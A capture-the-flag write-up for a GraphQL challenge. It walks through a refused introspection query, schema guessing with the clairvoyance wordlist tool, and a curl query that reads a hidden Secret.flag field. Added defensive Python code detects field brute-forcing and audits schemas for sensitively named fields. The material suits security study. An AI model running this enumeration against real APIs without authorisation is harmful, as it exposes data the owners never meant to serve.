GraphiCS

Description

[Screenshot: problem description]

Solution

The challenge website (https://graphics.chal.intentsummit.org)

[Screenshot: website]

In the Sources tab of Chrome DevTools we can see the static JS source of the React app at https://graphics.chal.intentsummit.org/static/js/index.js

import React from 'react';
import { render } from 'react-dom';
import {
  ApolloClient,
  InMemoryCache,
  ApolloProvider,
  useQuery,
  gql
} from "@apollo/client";

const client = new ApolloClient({
  uri: '/api/v1/',
  cache: new InMemoryCache()
});

const TALKS_DETAILS = gql`
query ExampleQuery {
  talks {
    time
    title
    speaker
  }
}

`;

...

In this source code we found the path to the GraphQL API: https://graphics.chal.intentsummit.org/api/v1/

[Screenshot: api]

We first tried basic enumeration through an introspection query:

jctf@jctf jctf % curl --request POST \
  --header 'content-type: application/json' \
  --url 'https://graphics.chal.intentsummit.org/api/v1/' \
  --data '{"query":"query {__schema{types{name,fields{name}}}}"}' --insecure
{"errors":[{"message":"GraphQL introspection is not allowed by Apollo Server, but the query contained __schema or __type. To enable introspection, pass introspection: true to ApolloServer in production","extensions":{"code":"GRAPHQL_VALIDATION_FAILED","exception":{"stacktrace":["GraphQLError: GraphQL introspection is not allowed by Apollo Server, but the query contained __schema or __type. To enable introspection, pass introspection: true to ApolloServer in production","    at Object.Field (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/ApolloServer.js:27:33)","    at Object.enter (/usr/src/app/node_modules/graphql/language/visitor.js:323:29)","    at Object.enter (/usr/src/app/node_modules/graphql/utilities/TypeInfo.js:370:25)","    at visit (/usr/src/app/node_modules/graphql/language/visitor.js:243:26)","    at validate (/usr/src/app/node_modules/graphql/validation/validate.js:69:24)","    at validate (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/requestPipeline.js:185:39)","    at processGraphQLRequest (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/requestPipeline.js:90:34)","    at processTicksAndRejections (node:internal/process/task_queues:96:5)","    at async processHTTPRequest (/usr/src/app/node_modules/apollo-server/node_modules/apollo-server-core/dist/runHttpQuery.js:187:30)"]}}}]}

Introspection is disabled on this server, so we found a Python script, clairvoyance (https://github.com/nikitastupin/clairvoyance), that reconstructs the schema by guessing field names from a word dictionary, and ran it with the google-10000-english wordlist (https://github.com/first20hours/google-10000-english):

python3 -m clairvoyance -k -o schema.json -w google-10000-english-master/google-10000-english.txt https://graphics.chal.intentsummit.org/api/v1/
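From the defender's side, a wordlist-driven schema reconstruction like the run above looks like one client producing a burst of validation failures (unknown field names), usually preceded by a rejected introspection query. The following added example, which is not part of the original write-up or of clairvoyance, shows detection logic for that pattern. The log format is an assumption: one JSON object per request carrying the client address, a timestamp, the query text and the `errors[].extensions.code` values the server returned (Apollo Server reports the failures above as `GRAPHQL_VALIDATION_FAILED`); the sample log lines are constructed, and the window and threshold are values to tune per API.

```python
"""Added example (not from the original write-up): flag clients whose GraphQL
requests fail validation at a rate that looks like field-name brute-forcing.

Assumed log format: one JSON object per request with `ts`, `client`, `query`
and `codes` (the errors[].extensions.code values returned by the server).
"""
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: one client sends a rejected introspection query and
# then guesses dictionary words as field names; a second client is benign.
SAMPLE_LOG = "\n".join(
    [json.dumps({"ts": "2021-11-09T10:00:00Z", "client": "203.0.113.7",
                 "codes": ["GRAPHQL_VALIDATION_FAILED"],
                 "query": "query {__schema{types{name}}}"})]
    + [json.dumps({"ts": f"2021-11-09T10:00:{i:02d}Z", "client": "203.0.113.7",
                   "codes": ["GRAPHQL_VALIDATION_FAILED"],
                   "query": f"query {{ {word} }}"})
       for i, word in enumerate(["the", "of", "and", "to", "in", "for", "is"], start=1)]
    + [json.dumps({"ts": "2021-11-09T10:00:05Z", "client": "198.51.100.2",
                   "codes": [], "query": "query { talks { title } }"})]
)

WINDOW = timedelta(seconds=60)   # sliding window per client (assumed value)
THRESHOLD = 5                    # validation failures in WINDOW that trigger an alert


def parse_line(line):
    """Parse one JSON log record and convert its timestamp to a datetime."""
    rec = json.loads(line)
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return rec


def detect(log_text, window=WINDOW, threshold=THRESHOLD):
    """Return {client: [(finding, timestamp), ...]} for suspicious clients."""
    records = sorted((parse_line(l) for l in log_text.splitlines() if l.strip()),
                     key=lambda r: r["ts"])
    findings = defaultdict(list)
    recent = defaultdict(deque)   # client -> timestamps of recent validation failures
    alerted = set()
    for rec in records:
        client = rec["client"]
        # When introspection is disabled, any attempt is worth recording on its own.
        if "__schema" in rec["query"] or "__type" in rec["query"]:
            findings[client].append(("introspection_attempt", rec["ts"]))
        if "GRAPHQL_VALIDATION_FAILED" not in rec["codes"]:
            continue
        q = recent[client]
        q.append(rec["ts"])
        # Drop failures that fell out of the sliding window.
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and client not in alerted:
            alerted.add(client)
            findings[client].append(("field_bruteforce_suspected", rec["ts"]))
    return dict(findings)


if __name__ == "__main__":
    for client, hits in detect(SAMPLE_LOG).items():
        for kind, ts in hits:
            print(f"{ts.isoformat()} {client} {kind}")
```

Feed `detect()` a real request log in the same shape and it reports, per client, the first time the failure rate crossed the threshold; the benign client in the sample never appears in the result.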

In schema.json we found an object type named Secret with a field named flag:

...

{
   "description": null,
   "enumValues": null,
   "fields": [
      {
            "args": [],
            "deprecationReason": null,
            "description": null,
            "isDeprecated": false,
            "name": "flag",
            "type": {
               "kind": "SCALAR",
               "name": "String",
               "ofType": null
            }
      }
   ],
   "inputFields": null,
   "interfaces": [],
   "kind": "OBJECT",
   "name": "Secret",
   "possibleTypes": null
}

...
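The schema.json excerpt above is the standard introspection layout (`kind`, `name`, `fields[].type` with `ofType` wrappers), which makes it easy to audit a dump of your own API for fields that should never have been reachable. The following is an added example, not part of the original write-up or of clairvoyance: it lists types and fields whose names look sensitive and walks the root Query type to show the query path that reaches each one. The `SCHEMA` document is constructed to mirror the excerpt (a `Secret` type with a `flag` field, reachable through a `_secret` root field), wrapped in the `{"data": {"__schema": ...}}` envelope an introspection response uses; the list of sensitive name fragments is an assumption to adjust per project.

```python
"""Added example (not from the original write-up): audit an introspection dump
for sensitively named fields and report the query path that exposes each one.
"""
import json
import re

# Name fragments treated as sensitive (assumed list; extend per project).
SENSITIVE = re.compile(r"secret|flag|token|password|passwd|api_?key|private", re.I)

# Constructed schema mirroring the write-up's excerpt, in introspection shape.
SCHEMA = json.loads("""
{
  "data": { "__schema": {
    "queryType": {"name": "Query"},
    "types": [
      {"kind": "OBJECT", "name": "Query", "fields": [
        {"name": "talks", "type": {"kind": "LIST", "name": null,
          "ofType": {"kind": "OBJECT", "name": "Talk", "ofType": null}}},
        {"name": "_secret", "type": {"kind": "LIST", "name": null,
          "ofType": {"kind": "OBJECT", "name": "Secret", "ofType": null}}}
      ]},
      {"kind": "OBJECT", "name": "Talk", "fields": [
        {"name": "time", "type": {"kind": "SCALAR", "name": "String", "ofType": null}},
        {"name": "title", "type": {"kind": "SCALAR", "name": "String", "ofType": null}},
        {"name": "speaker", "type": {"kind": "SCALAR", "name": "String", "ofType": null}}
      ]},
      {"kind": "OBJECT", "name": "Secret", "fields": [
        {"name": "flag", "type": {"kind": "SCALAR", "name": "String", "ofType": null}}
      ]}
    ]
  }}
}
""")


def named_type(type_ref):
    """Unwrap LIST / NON_NULL wrappers down to the underlying named type."""
    while type_ref and type_ref.get("name") is None:
        type_ref = type_ref.get("ofType")
    return type_ref["name"] if type_ref else None


def build_index(schema):
    """Map type name -> type definition for quick lookup."""
    return {t["name"]: t for t in schema["data"]["__schema"]["types"]}


def find_sensitive_fields(schema):
    """Return (type_name, field_name) pairs whose type or field name looks sensitive."""
    hits = []
    for t in schema["data"]["__schema"]["types"]:
        if t.get("kind") != "OBJECT" or t["name"].startswith("__"):
            continue
        for f in t.get("fields") or []:
            if SENSITIVE.search(f["name"]) or SENSITIVE.search(t["name"]):
                hits.append((t["name"], f["name"]))
    return hits


def exposure_paths(schema, target_type):
    """Dotted field paths from the root query type that reach target_type."""
    index = build_index(schema)
    root = schema["data"]["__schema"]["queryType"]["name"]
    paths = []

    def walk(type_name, path, seen):
        for f in index.get(type_name, {}).get("fields") or []:
            nxt = named_type(f["type"])
            new_path = path + [f["name"]]
            if nxt == target_type:
                paths.append(".".join(new_path))
            elif nxt not in seen and index.get(nxt, {}).get("kind") == "OBJECT":
                walk(nxt, new_path, seen | {nxt})   # seen guards against cycles

    walk(root, [], {root})
    return paths


def audit(schema):
    """Return {"Type.field": [query paths that expose it]} for every sensitive field."""
    root = schema["data"]["__schema"]["queryType"]["name"]
    report = {}
    for type_name, field in find_sensitive_fields(schema):
        if type_name == root:
            paths = [field]
        else:
            paths = [p + "." + field for p in exposure_paths(schema, type_name)]
        report[f"{type_name}.{field}"] = paths
    return report


if __name__ == "__main__":
    print(json.dumps(audit(SCHEMA), indent=2))
```

Running `audit()` on a real dump (for example `audit(json.load(open("schema.json")))`) gives one line per finding; for the constructed schema it reports `Secret.flag` as reachable through `_secret.flag`, which is exactly the query used below. Disabling introspection hides the schema from casual inspection but, as this write-up shows, not from guessing; an audit like this is what catches a field that has no authorization on its resolver.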

We queried this field:

jctf@jctf jctf % curl --request POST \
  --header 'content-type: application/json' \
  --url 'https://graphics.chal.intentsummit.org/api/v1/' \
  --data '{"query":"query {_secret{flag}}"}' --insecure
{"data":{"_secret":[{"flag":"INTENT{d1d_y0u_m34n_flag}"}]}}

We got the flag!

Flag: INTENT{d1d_y0u_m34n_flag}